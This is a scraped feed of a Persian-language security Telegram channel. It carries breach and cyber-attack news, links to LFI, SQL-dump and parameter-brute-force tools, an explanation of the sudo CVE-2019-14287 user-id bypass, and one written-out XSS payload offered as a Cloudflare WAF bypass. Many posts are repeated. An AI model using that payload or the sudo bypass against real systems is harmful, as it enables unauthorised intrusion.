https://www.icscybersecurityconference.com/intelligence-gathering-on-u-s-critical-infrastructure/
#osint
@sec_nerd
#osint
@sec_nerd
Industrial Control Systems (ICS) Cybersecurity Conference
Intelligence Gathering on U.S. Critical Infrastructure - Industrial Control Systems (ICS) Cybersecurity Conference
Researcher uses a free tool that he created and OSINT to show how easy it is for adversaries to gather intelligence on critical infrastructure in the United States.
امنیت اطلاعات
vb5.py
آسیب پذیری مورد اشاره در vBulletin که با شناسه CVE-2019-16759 ثبت شده است منجر به هک شدن برخی انجمن های مربوط به sex workers (معادل فارسی مناسبی ندارم براش) در کشورهای ایتالیا و هلند شد.
هکر بلغارستانی با نام مستعار InstaKilla از انجمن ایتالیایی حدود ۳۳ هزار و از انجمن هلندی نزدیک به ۳۰۰ هزار رکورد حاوی نام کاربری، ایمیل و پسوردهای هش شده بدست آورده است.
در حال حاضر این دیتا برای فروش در دارک نت به مزایده گذاشته شده است و این خطر اخاذی از افرادی که در انجمن های مربوطه فعال بوده اند را افزایش می دهد.
منبع:
https://www.zdnet.com/article/escort-forums-in-italy-and-the-netherlands-hacked-user-data-put-up-for-sale/
#news
#breach
#vbulletin
@sec_nerd
هکر بلغارستانی با نام مستعار InstaKilla از انجمن ایتالیایی حدود ۳۳ هزار و از انجمن هلندی نزدیک به ۳۰۰ هزار رکورد حاوی نام کاربری، ایمیل و پسوردهای هش شده بدست آورده است.
در حال حاضر این دیتا برای فروش در دارک نت به مزایده گذاشته شده است و این خطر اخاذی از افرادی که در انجمن های مربوطه فعال بوده اند را افزایش می دهد.
منبع:
https://www.zdnet.com/article/escort-forums-in-italy-and-the-netherlands-hacked-user-data-put-up-for-sale/
#news
#breach
#vbulletin
@sec_nerd
ZDNet
Escort forums in Italy and the Netherlands hacked, user data put up for sale
A third forum for zoophilia and bestiality fans was also hacked. User data put up for sale as well.
ابزارهای حمله ی LFI یا Local File inclusion
https://github.com/mzfr/liffy
https://github.com/chrispetrou/FDsploit
https://github.com/BoxingOctopus/toxin
https://github.com/S1lkys/Auto_LFI
https://github.com/sleventyeleven/lfimap
https://github.com/D35m0nd142/LFISuite
https://github.com/Hack-Hut/CrabStick
#web
#pentest
#lfi
@sec_nerd
https://github.com/mzfr/liffy
https://github.com/chrispetrou/FDsploit
https://github.com/BoxingOctopus/toxin
https://github.com/S1lkys/Auto_LFI
https://github.com/sleventyeleven/lfimap
https://github.com/D35m0nd142/LFISuite
https://github.com/Hack-Hut/CrabStick
#web
#pentest
#lfi
@sec_nerd
GitHub
GitHub - mzfr/liffy: Local file inclusion exploitation tool
Local file inclusion exploitation tool. Contribute to mzfr/liffy development by creating an account on GitHub.
رایت آپ آسیب پذیری SSRF در وبسایت معروف Vimeo
https://medium.com/@rootxharsh_90844/vimeo-ssrf-with-code-execution-potential-68c774ba7c1e
#writeup
#web
#ssrf
#vimeo
@sec_nerd
https://medium.com/@rootxharsh_90844/vimeo-ssrf-with-code-execution-potential-68c774ba7c1e
#writeup
#web
#ssrf
#vimeo
@sec_nerd
Medium
Vimeo SSRF with code execution potential.
Recently i discovered a semi responded SSRF on Vimeo with code execution possibility. This blog post explains how i found & exploited it…
کشف آسیب پذیری sqli با استفاده از آنالیز white box (با داشتن سورس کد)
https://medium.com/@frycos/finding-sql-injections-fast-with-white-box-analysis-a-recent-bug-example-ca449bce6c76
#writeup
#sqli
#web
#pentest
@sec_nerd
https://medium.com/@frycos/finding-sql-injections-fast-with-white-box-analysis-a-recent-bug-example-ca449bce6c76
#writeup
#sqli
#web
#pentest
@sec_nerd
Medium
Finding SQL injections fast with white-box analysis — a recent bug example
On September 13rd I submitted a bug for Zoho’s OpManager product. It was fixed quite fast by the development team and a new version 12.4…
امنیت اطلاعات
مصاحبه راشاتودی با دو فرد روس که متهم به ترور اسکریپال هستند و میگن که برای دیدن کلیسا به شهر سالزبری رفته بودن! :)) #news #russia #gb #england @sec_nerd
اگر حوصله و زمان کافی دارید حتما این گزارش رو بخونید!
یکی از افرادی که در قتل اسکریپال دست داشت ( به ادعای تیم تحقیق Bellingcat) در تصاویر جشن ازدواج فرمانده واحد 29155 ارتش روسیه پیدا شد.
https://www.bellingcat.com/news/uk-and-europe/2019/10/14/averyanov-chepiga/
#news
#russia
#gb
#england
#osint
@sec_nerd
یکی از افرادی که در قتل اسکریپال دست داشت ( به ادعای تیم تحقیق Bellingcat) در تصاویر جشن ازدواج فرمانده واحد 29155 ارتش روسیه پیدا شد.
https://www.bellingcat.com/news/uk-and-europe/2019/10/14/averyanov-chepiga/
#news
#russia
#gb
#england
#osint
@sec_nerd
bellingcat
Skripal Poisoner Attended GRU Commander Family Wedding - bellingcat
In a series of investigative reports in 2018 and this year, Bellingcat and its media partners disclosed the existence of an elite unit within Russian military intelligence (GRU) engaging in clandestine overseas operations. This unit consists of approximately…
کشف آسیب پذیری در Sudo
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
asciinema.org
CVE-2019-14287
Recorded by Jas502n
مقام امریکایی که نخواست هویتش افشا شود در مصاحبه با رویترز اعلام کرد ایالات متحده حمله سایبری را در اواخر ماه سپتامبر علیه ایران ترتیب داده است.
این فرد مدعی شد حمله ی مذکور سخت افزار فیزیکی را هدف قرار داده و از اعلام جزییات بیشتری در این خصوص خودداری کرد.
این حمله پس از حمله به تاسیسات نفتی عربستان رخ داده اما پنتاگون در این خصوص اظهار نظر نکرده است.
منبع:
https://www.reuters.com/article/us-usa-iran-military-cyber-exclusive/exclusive-us-carried-out-secret-cyber-strike-on-iran-in-wake-of-saudi-oil-attack-officials-say-idUSKBN1WV0EK
#usa
#iran
#news
@sec_nerd
این فرد مدعی شد حمله ی مذکور سخت افزار فیزیکی را هدف قرار داده و از اعلام جزییات بیشتری در این خصوص خودداری کرد.
این حمله پس از حمله به تاسیسات نفتی عربستان رخ داده اما پنتاگون در این خصوص اظهار نظر نکرده است.
منبع:
https://www.reuters.com/article/us-usa-iran-military-cyber-exclusive/exclusive-us-carried-out-secret-cyber-strike-on-iran-in-wake-of-saudi-oil-attack-officials-say-idUSKBN1WV0EK
#usa
#iran
#news
@sec_nerd
Reuters
Exclusive: U.S. carried out secret cyber strike on Iran in wake of Saudi oil attack: officials
WASHINGTON (Reuters) - The United States carried out a secret cyber operation against Iran in the wake of the Sept. 14 attacks on Saudi Arabia’s oil facilities, which Washington and Riyadh blame on Tehran, two U.S. officials have told Reuters.
ابزارهایی برای بروت فورس کردن پارامترهای GET و POST
https://github.com/Bo0oM/ParamPamPam
https://github.com/s0md3v/Arjun
https://github.com/portswigger/param-miner
https://github.com/maK-/parameth
#web
#pentest
#bugbounty
@sec_nerd
https://github.com/Bo0oM/ParamPamPam
https://github.com/s0md3v/Arjun
https://github.com/portswigger/param-miner
https://github.com/maK-/parameth
#web
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - Bo0oM/ParamPamPam
Contribute to Bo0oM/ParamPamPam development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
sqlbuster
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
Don't panic! sudo flaw CVE-2019-14287 needs a specific config.
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
Twitter
2*yo
Don't panic! sudo flaw CVE-2019-14287 needs a specific config. If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. Example: myhost bob = (ALL, !root) /usr/bin/vi https:/…
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
شرح کاملتری از آسیب پذیری کشف شده در sudo
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
Sysdig
How to detect CVE-2019-14287 using Falco | Sysdig
A recent flaw (CVE-2019-14287) has been found in sudo. Learn how to use Falco or Sysdig Secure to detect any exploit attempts against this vulnerability.
شرکت emsisoft برنامه رمزگشای باج افزار Puma را منتشر کرد
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
Emsisoft
STOP Puma decryptor
Free STOP Puma ransomware decryptor by Emsisoft. Unlock your files without paying the ransom.
بعد از فایلهای ویدئویی، اینبار هکرها موفق شدند پیلودهای آلوده خود را در فایلهای WAV جاگذاری کنند.
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
BlackBerry
Malicious Payloads - Hiding Beneath the WAV
BlackBerry Cylance Threat Researchers recently discovered obfuscated malicious code embedded within WAV audio files. Each WAV file was coupled with a loader component for decoding and executing malicious content secretly woven throughout the file’s audio…
فرارسیدن اربعین حسینی را به همه ی بزرگواران همراه تسلیت عرض میکنیم.
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
تو شرکتمون مسئول مصاحبه هستم
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
هکرهای روس زبان نسخه ی دستکاری شده ی مرورگر tor را تحت عنوان «نسخه اصلی روسی» به کاربران دادند و اقدام به سرقت بیت کوین از آنان کردند.
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
Dark Reading
Tor Weaponized to Steal Bitcoin
A years-long campaign targets users of Russian darknet markets with a modified install of a privacy-oriented browser.
سلام
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
Telegram
Web_Priv8
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf